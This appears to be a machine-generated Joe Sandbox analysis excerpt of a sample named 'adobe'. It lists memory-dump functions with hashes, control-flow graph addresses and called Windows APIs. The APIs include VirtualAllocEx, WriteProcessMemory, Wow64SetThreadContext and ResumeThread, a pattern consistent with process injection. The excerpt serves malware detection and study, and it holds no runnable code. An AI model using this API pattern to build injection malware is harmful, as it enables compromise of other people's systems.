                                    • Opcode ID: 6d4b7cb248eef5971cfef910dbc9c514ae5b3c6c3a2add425ee8709c670d16b1
                                    • Instruction ID: caf50883a4a6e91a234d79ecba137b10b5dd3259ff8662c601e282e64025fdab
                                    • Opcode Fuzzy Hash: 6d4b7cb248eef5971cfef910dbc9c514ae5b3c6c3a2add425ee8709c670d16b1
                                    • Instruction Fuzzy Hash: 2741D5B0D00719DFDB24CFA9C9847CDBBB5BF49704F24806AD408AB255DB756946CF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 764 11c44b0-11c59d9 CreateActCtxA 768 11c59db-11c59e1 764->768 769 11c59e2-11c5a3c 764->769 768->769 776 11c5a3e-11c5a41 769->776 777 11c5a4b-11c5a4f 769->777 776->777 778 11c5a60 777->778 779 11c5a51-11c5a5d 777->779 780 11c5a61 778->780 779->778 780->780
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 011C59C9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1812914544.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_11c0000_adobe.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID: $F6A
                                    • API String ID: 2289755597-4072994420
                                    • Opcode ID: 60a5e7bc2359f6ec0c58ea4c4170be7cc17e20bdc5278089ad60b55061d6448f
                                    • Instruction ID: fd60148d99f05e155a9c1732d9fd26fa91dc8fd9b5be49d74c0a9c9abed497ed
                                    • Opcode Fuzzy Hash: 60a5e7bc2359f6ec0c58ea4c4170be7cc17e20bdc5278089ad60b55061d6448f
                                    • Instruction Fuzzy Hash: 0C41D4B0D00719CBDB24CFAAC8447CEBBB6BF49704F248059D408AB255DB75A945CF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 782 5c25038-5c2508c 784 5c25097-5c250a6 782->784 785 5c2508e-5c25094 782->785 786 5c250ab-5c250e4 DrawTextExW 784->786 787 5c250a8 784->787 785->784 788 5c250e6-5c250ec 786->788 789 5c250ed-5c2510a 786->789 787->786 788->789
                                    APIs
                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05C250D7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817310629.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_5c20000_adobe.jbxd
                                    Similarity
                                    • API ID: DrawText
                                    • String ID: $F6A
                                    • API String ID: 2175133113-4072994420
                                    • Opcode ID: e0a009a9444341c398d07e434db2742780b2809b5f11e6e025b55049d06a055b
                                    • Instruction ID: d181d4de8bb2268aae04db77d6c1e17bdeafcfa3932a7deeebd9062f8af57719
                                    • Opcode Fuzzy Hash: e0a009a9444341c398d07e434db2742780b2809b5f11e6e025b55049d06a055b
                                    • Instruction Fuzzy Hash: 4B31C3B5D002599FDB10CF9AD884ADEFBF4FB48320F14842AE919A7310D775A944CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 792 70b6269-70b62be 795 70b62ce-70b630d WriteProcessMemory 792->795 796 70b62c0-70b62cc 792->796 798 70b630f-70b6315 795->798 799 70b6316-70b6346 795->799 796->795 798->799
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070B6300
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID: $F6A
                                    • API String ID: 3559483778-4072994420
                                    • Opcode ID: d56d704162aca9202cba090d2a9f7af257ff7945e0649f69ce8a2e42d04b25d6
                                    • Instruction ID: 482ff74e60a8ef60cb66c066d8216609b67fa24dbe9553a10b0f1ac81b390fbf
                                    • Opcode Fuzzy Hash: d56d704162aca9202cba090d2a9f7af257ff7945e0649f69ce8a2e42d04b25d6
                                    • Instruction Fuzzy Hash: 0D2148B19003599FCB10CFA9C881BDEBBF5FF48310F14882AE999A7251D7789954CBA4

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 803 5c25040-5c2508c 804 5c25097-5c250a6 803->804 805 5c2508e-5c25094 803->805 806 5c250ab-5c250e4 DrawTextExW 804->806 807 5c250a8 804->807 805->804 808 5c250e6-5c250ec 806->808 809 5c250ed-5c2510a 806->809 807->806 808->809
                                    APIs
                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05C250D7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817310629.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_5c20000_adobe.jbxd
                                    Similarity
                                    • API ID: DrawText
                                    • String ID: $F6A
                                    • API String ID: 2175133113-4072994420
                                    • Opcode ID: 1662f30c5a3893da2cbb8155eb7e29c2c6116120b12331c4307f70d6fb3fa551
                                    • Instruction ID: d4524459ede404835535b267cf7c987398844a1f88c052ac46a2003c2a181fa9
                                    • Opcode Fuzzy Hash: 1662f30c5a3893da2cbb8155eb7e29c2c6116120b12331c4307f70d6fb3fa551
                                    • Instruction Fuzzy Hash: E121D2B5D002599FDB10CF9AD884ADEFBF4FB48320F14842AE919A7210D775A944CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 812 70b6270-70b62be 814 70b62ce-70b630d WriteProcessMemory 812->814 815 70b62c0-70b62cc 812->815 817 70b630f-70b6315 814->817 818 70b6316-70b6346 814->818 815->814 817->818
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070B6300
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID: $F6A
                                    • API String ID: 3559483778-4072994420
                                    • Opcode ID: ddaaac3d0c91c5371a5cda044d0501ba1e6483a5a544e013a0f17db810f14953
                                    • Instruction ID: 81ccf5fabb78d9831bfadb6e3dc590690f601a8c20ce03dce3cb0759a2cc5f92
                                    • Opcode Fuzzy Hash: ddaaac3d0c91c5371a5cda044d0501ba1e6483a5a544e013a0f17db810f14953
                                    • Instruction Fuzzy Hash: F92127B1900359DFCB10CFA9C885BDEBBF5FF48320F108429E958A7250C7799954CBA4

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 822 11ccfb0-11cd6fc DuplicateHandle 824 11cd6fe-11cd704 822->824 825 11cd705-11cd722 822->825 824->825
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,011CD62E,?,?,?,?,?), ref: 011CD6EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1812914544.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_11c0000_adobe.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID: $F6A
                                    • API String ID: 3793708945-4072994420
                                    • Opcode ID: 8af8fa94d970e1ef2aebe14442fd520a32b5006f57e0b7893eeea4292ecf0a5f
                                    • Instruction ID: 280911a4465cb8dc7c2a2731b001f98e5942605dc7212faa65431284d07b61dd
                                    • Opcode Fuzzy Hash: 8af8fa94d970e1ef2aebe14442fd520a32b5006f57e0b7893eeea4292ecf0a5f
                                    • Instruction Fuzzy Hash: E521E5B5900258AFDB10CF99D584ADEBFF4FB48314F14802AE918A7350D374A954CFA5
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070B63E0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID: $F6A
                                    • API String ID: 1726664587-4072994420
                                    • Opcode ID: 9da13a53d576960c86983b831bd278ff8e3ea930379667ac51a4fd8a0138d663
                                    • Instruction ID: e3798d39213608d03349d047d5cd95a23218bdf4fc36fc99e053330cb0a0685b
                                    • Opcode Fuzzy Hash: 9da13a53d576960c86983b831bd278ff8e3ea930379667ac51a4fd8a0138d663
                                    • Instruction Fuzzy Hash: 662128B1D003599FCB10DFA9C884AEEFBF5FF48320F14842AE559A7250C7799944CB64
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070B63E0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID: $F6A
                                    • API String ID: 1726664587-4072994420
                                    • Opcode ID: e5a8767b107423c2bf61fab91498b552b6db9bee9b804987225085e6ce6a37f0
                                    • Instruction ID: 33e922b52c57b89e05d16e16488a27fe8bd54687324d7bbc453be94495bae712
                                    • Opcode Fuzzy Hash: e5a8767b107423c2bf61fab91498b552b6db9bee9b804987225085e6ce6a37f0
                                    • Instruction Fuzzy Hash: B421F5B1D003599FCB10DFAAC985AEEBBF5FF48320F10842AE559A7250C7799944CBA4
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070B6156
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: $F6A
                                    • API String ID: 983334009-4072994420
                                    • Opcode ID: 68b61aff6615f40a0e1f7a6a6520176ec4644c9213a9e7d64987ce95be54d7ed
                                    • Instruction ID: d3c0debae9e34df4fed15c3acf05f49b462e189a06823a635a2645c4fff8fc8b
                                    • Opcode Fuzzy Hash: 68b61aff6615f40a0e1f7a6a6520176ec4644c9213a9e7d64987ce95be54d7ed
                                    • Instruction Fuzzy Hash: 682107B1D002599FDB20DFAAC4857EEBBF4AB88324F148429D459A7341C7799944CFA4
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070B6156
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: $F6A
                                    • API String ID: 983334009-4072994420
                                    • Opcode ID: 4fd7c8fc629f2908363c85d155c335b63e1f859cafd88fdbf7187267e3afc6bd
                                    • Instruction ID: bc7cedd6919f1226e098ef10df61d3d96539900226cf6d858eee16ce9e9f5f7d
                                    • Opcode Fuzzy Hash: 4fd7c8fc629f2908363c85d155c335b63e1f859cafd88fdbf7187267e3afc6bd
                                    • Instruction Fuzzy Hash: 4A2137B1D003498FDB20DFA9C4847EEBFF4AF89324F14852AD499A7241C7789945CFA4
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070B621E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: $F6A
                                    • API String ID: 4275171209-4072994420
                                    • Opcode ID: 616c2700789c7729d768289223080d69e1f4f3909593cee5319c40fc77fbead6
                                    • Instruction ID: 0532b45c43dd16f09f15c39f36d8505cf4795056fa240b5b7f1e9625fd00c224
                                    • Opcode Fuzzy Hash: 616c2700789c7729d768289223080d69e1f4f3909593cee5319c40fc77fbead6
                                    • Instruction Fuzzy Hash: 3A1159B19002499FCB20DFA9C844ADFFFF5EF48320F248819E555A7250C7759944CFA4
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011CB481,00000800,00000000,00000000), ref: 011CB672
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1812914544.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_11c0000_adobe.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: $F6A
                                    • API String ID: 1029625771-4072994420
                                    • Opcode ID: 512e8410411c268c7c837e3525d04f5083f0c04a3ba7c0c5edef1828f3378f4f
                                    • Instruction ID: 59025e7548c632df0c30808836d7d69d7923f5f56bbc11dd64b0259ed8e75401
                                    • Opcode Fuzzy Hash: 512e8410411c268c7c837e3525d04f5083f0c04a3ba7c0c5edef1828f3378f4f
                                    • Instruction Fuzzy Hash: 2C1144B6C042189FDB24CF9AC444ADEFBF4EB98310F10802ED519B7210C375A544CFA8
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011CB481,00000800,00000000,00000000), ref: 011CB672
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1812914544.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_11c0000_adobe.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: $F6A
                                    • API String ID: 1029625771-4072994420
                                    • Opcode ID: c3bd04d1256e550f056745aa1fa3a6debcfb55cc1d172229fa8e66bd33a1480a
                                    • Instruction ID: c70214e6d4160ea3f6fae93eb7faa88dfcc3050b1fdcbadd7bf082e5a8ec1a09
                                    • Opcode Fuzzy Hash: c3bd04d1256e550f056745aa1fa3a6debcfb55cc1d172229fa8e66bd33a1480a
                                    • Instruction Fuzzy Hash: A5111FB6C002598FDB24CF9AC544ADEFBF4AB58320F10842AD559A7210C379A545CFA4
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID: $F6A
                                    • API String ID: 947044025-4072994420
                                    • Opcode ID: 100564c753257259e89e3f32b0992788abea519c749672b93af390d5781c87c2
                                    • Instruction ID: 63decb723a62e0c228aa73d7064325d1a0f176cc362584c5c5e138a882a3c8b2
                                    • Opcode Fuzzy Hash: 100564c753257259e89e3f32b0992788abea519c749672b93af390d5781c87c2
                                    • Instruction Fuzzy Hash: 8F1149B19002498FCB20DFAAC8457DEFFF5EF88324F248859D459A7250D6756544CFA4
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070B621E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: $F6A
                                    • API String ID: 4275171209-4072994420
                                    • Opcode ID: a6f98d0b52c3bced6f678b6ebe2dc071019bcbc42191c8cb2d2a19427aa518f8
                                    • Instruction ID: f7073d4c86c103e7699bcae5e111434b914ee53633cf29901d59ad0e24f65cea
                                    • Opcode Fuzzy Hash: a6f98d0b52c3bced6f678b6ebe2dc071019bcbc42191c8cb2d2a19427aa518f8
                                    • Instruction Fuzzy Hash: 451156B28002499FCB20DFAAC844ADEBFF5EB48320F108819E555A7250C775A944CFA4
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 05C2A978
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817310629.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_5c20000_adobe.jbxd
                                    Similarity
                                    • API ID: ChangeCloseFindNotification
                                    • String ID: $F6A
                                    • API String ID: 2591292051-4072994420
                                    • Opcode ID: 7042697d7cc2fa9e7bdbddac6ae3eb30f003450e5885b6ef6b35dc556c8f56e8
                                    • Instruction ID: 8ce5a94a05c12ca3931695b27efdb1ba8947782b85ca32700382112aa886098f
                                    • Opcode Fuzzy Hash: 7042697d7cc2fa9e7bdbddac6ae3eb30f003450e5885b6ef6b35dc556c8f56e8
                                    • Instruction Fuzzy Hash: E31128B5900259CFCB10DF9AC945BDEBBF4EB48320F108419D958A7350D378A544CFA5
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID: $F6A
                                    • API String ID: 947044025-4072994420
                                    • Opcode ID: ff64e3aaebd41b11a9fc8cd24f6e14ab9af9aff1844cf85988b152b114df2071
                                    • Instruction ID: ec8337942f0479b1658aa9486bc57b2caa3d24bec968562ee6868eb273b89b4c
                                    • Opcode Fuzzy Hash: ff64e3aaebd41b11a9fc8cd24f6e14ab9af9aff1844cf85988b152b114df2071
                                    • Instruction Fuzzy Hash: 15113AB1D003498FCB20DFAAC4457DEFBF9EB88324F248419D459A7250C775A944CFA4
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 070B89B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID: $F6A
                                    • API String ID: 410705778-4072994420
                                    • Opcode ID: cbf12229b5fb570b77924c5024f7dbaf414cd24437a817f78552ed9275c6bf4d
                                    • Instruction ID: e05d367ed9b341f583d4cb92e9a006c935551c86bf51b86683e9210d8545500c
                                    • Opcode Fuzzy Hash: cbf12229b5fb570b77924c5024f7dbaf414cd24437a817f78552ed9275c6bf4d
                                    • Instruction Fuzzy Hash: 321113B5800249DFCB20CF9AD484BDEBFF8EB48324F148459E458A7610C375A584CFA5
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 011CB406
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1812914544.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_11c0000_adobe.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID: $F6A
                                    • API String ID: 4139908857-4072994420
                                    • Opcode ID: b53255258c454a84bd12405f8abd12a8eb27c1e427702103fc763bca2588050b
                                    • Instruction ID: 5e0453f802577edf1110ca71bb44910fe13b5ce881634b8c99ae611ae4037d84
                                    • Opcode Fuzzy Hash: b53255258c454a84bd12405f8abd12a8eb27c1e427702103fc763bca2588050b
                                    • Instruction Fuzzy Hash: 0D1110B5C043498FDB24CF9AD444ADEFBF4AB88324F10842AD819B7210C379A545CFA5
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 05C2A978
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817310629.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_5c20000_adobe.jbxd
                                    Similarity
                                    • API ID: ChangeCloseFindNotification
                                    • String ID: $F6A
                                    • API String ID: 2591292051-4072994420
                                    • Opcode ID: 0789bc92078583163204e475a2e2986ba9ffb4c63675f6b7880fb7405a3eb07d
                                    • Instruction ID: 540bebc8284560f205d424860998d7f0a5ee8c9f25c8aac34578b27fa48431f5
                                    • Opcode Fuzzy Hash: 0789bc92078583163204e475a2e2986ba9ffb4c63675f6b7880fb7405a3eb07d
                                    • Instruction Fuzzy Hash: BA1103B5800259CFCB20DF9AD945BDEBBF4EB48320F11841AD558A7250D778A944CFA5
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 070B89B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID: $F6A
                                    • API String ID: 410705778-4072994420
                                    • Opcode ID: a84993bb45057f48b8687e357dc18c77ed15d674409504add8b48c0a4f0f32fb
                                    • Instruction ID: b905f27b3cefb9b9e1a5b9e60e82c7d976aa26a1cb7425e35e07992f720a909c
                                    • Opcode Fuzzy Hash: a84993bb45057f48b8687e357dc18c77ed15d674409504add8b48c0a4f0f32fb
                                    • Instruction Fuzzy Hash: 371122B5800349DFDB20CF9AC448BDEBBF8EB58324F108419E558A7250C375A984CFA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Tekq$Tekq
                                    • API String ID: 0-2269808460
                                    • Opcode ID: 28c260826de726f9cdbb56f7133a87fee28810214addc1d50fa1062c890c45f1
                                    • Instruction ID: 4bcb8637f66739ac80374423fe416d9534008281ede363f7b1333d0f4cab58fb
                                    • Opcode Fuzzy Hash: 28c260826de726f9cdbb56f7133a87fee28810214addc1d50fa1062c890c45f1
                                    • Instruction Fuzzy Hash: 884177B4B002049BD704AFA8D595BAE76F7EB88705F209419F905A7788CF789C07CBD5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Tekq$Tekq
                                    • API String ID: 0-2269808460
                                    • Opcode ID: 7ad147e761a0302b6e3ae0b03e0061d924c2fef0f25d1da4cd46b8cd2a815752
                                    • Instruction ID: 7c5936d95c214c27710aaf441f9f3f55259ee690995d3837227dba55fde3d781
                                    • Opcode Fuzzy Hash: 7ad147e761a0302b6e3ae0b03e0061d924c2fef0f25d1da4cd46b8cd2a815752
                                    • Instruction Fuzzy Hash: BE4188B4B002049BD704AFA8D595BAE76F7EB88705F209419F905A7788CF789C07CBD5
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1812914544.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_11c0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6ea3d058a827ec7ca5d0d91fc38b3de524ca2bc395b8f946e8abcdd589025202
                                    • Instruction ID: e238506ff6e0c1fd3cf2e02ee16170c190e2f089e07d90f3175be193e95f9999
                                    • Opcode Fuzzy Hash: 6ea3d058a827ec7ca5d0d91fc38b3de524ca2bc395b8f946e8abcdd589025202
                                    • Instruction Fuzzy Hash: 82310CB1904209CFDB18CBA8C8447EDBFB2AF66714F14818EC009AB266DB75A846CB41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $F6A
                                    • API String ID: 0-4072994420
                                    • Opcode ID: d1ec6ced2234ebd2a65c054cfbb6d96bd5a7e8833e2ec28164c4a0c5073b1db6
                                    • Instruction ID: 715f8e4afe3fe94d0107c7108f14123a335c4c7b51fdfaa8d55b68444acd9b37
                                    • Opcode Fuzzy Hash: d1ec6ced2234ebd2a65c054cfbb6d96bd5a7e8833e2ec28164c4a0c5073b1db6
                                    • Instruction Fuzzy Hash: 08618835E00248DFCB14EFA9D594BEDBBF1EF88315F14816AE406AB760DB74A844CB61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $F6A
                                    • API String ID: 0-4072994420
                                    • Opcode ID: b99c09a7ca8512545b2e74973dc19817454448c3081d68d14f14ba5dc23072aa
                                    • Instruction ID: c0e77625ec878028a20fb835ac3152a13176763cc289b2f233bbc797a5505309
                                    • Opcode Fuzzy Hash: b99c09a7ca8512545b2e74973dc19817454448c3081d68d14f14ba5dc23072aa
                                    • Instruction Fuzzy Hash: 6A515934E00248DFCB14DFA8D594AEDBBB2FF88300F14816AE406AB764DB74A845CB61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Tekq
                                    • API String ID: 0-2319236580
                                    • Opcode ID: 4536cb875b59096e8a86127890937aa31f007532ca9999d45d586408148826cf
                                    • Instruction ID: 1a3c4c86a3785a437c5304a92b994e77af7838fdb8a09b3640879bcb88cbd4e1
                                    • Opcode Fuzzy Hash: 4536cb875b59096e8a86127890937aa31f007532ca9999d45d586408148826cf
                                    • Instruction Fuzzy Hash: F051AF75B002158FCB14DBB9D9849AEBBF6EFC42607148529E42AD7791EF30DD068B50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $F6A
                                    • API String ID: 0-4072994420
                                    • Opcode ID: 7a76be7e7b19869d3de9a34446e5bde76f3d64e2642799d3f9e268c6592ba53f
                                    • Instruction ID: 3571cd126018c21c8daa2d2aa45ce9a54545be1aae79471c93f7ca4c277284e1
                                    • Opcode Fuzzy Hash: 7a76be7e7b19869d3de9a34446e5bde76f3d64e2642799d3f9e268c6592ba53f
                                    • Instruction Fuzzy Hash: 123137B5900208EFCF14DFA9D984ADEBFF9EB48320F14842AE509E7611D734A955CFA4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $F6A
                                    • API String ID: 0-4072994420
                                    • Opcode ID: cb859bfc7ad128b3967f239dcc23c5c220326dd481e2f6860600c62b8d8b6d00
                                    • Instruction ID: faee2e4b326f1ad383b89300eac852a85ee4e796213c5ba38d8b9c90bf28f459
                                    • Opcode Fuzzy Hash: cb859bfc7ad128b3967f239dcc23c5c220326dd481e2f6860600c62b8d8b6d00
                                    • Instruction Fuzzy Hash: E54124B1D01248EFDB14DF99D984BDEBBF5AF48314F24802AE406A7640DB759849CF90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $F6A
                                    • API String ID: 0-4072994420
                                    • Opcode ID: f785101500794fa8faa5d6e8173794d394b771c383731637d1734838cc41906d
                                    • Instruction ID: fab51f0dc06a21eb1c106d0bcccf6799ebd27c83a6e2944a8a146fba3b8e5044
                                    • Opcode Fuzzy Hash: f785101500794fa8faa5d6e8173794d394b771c383731637d1734838cc41906d
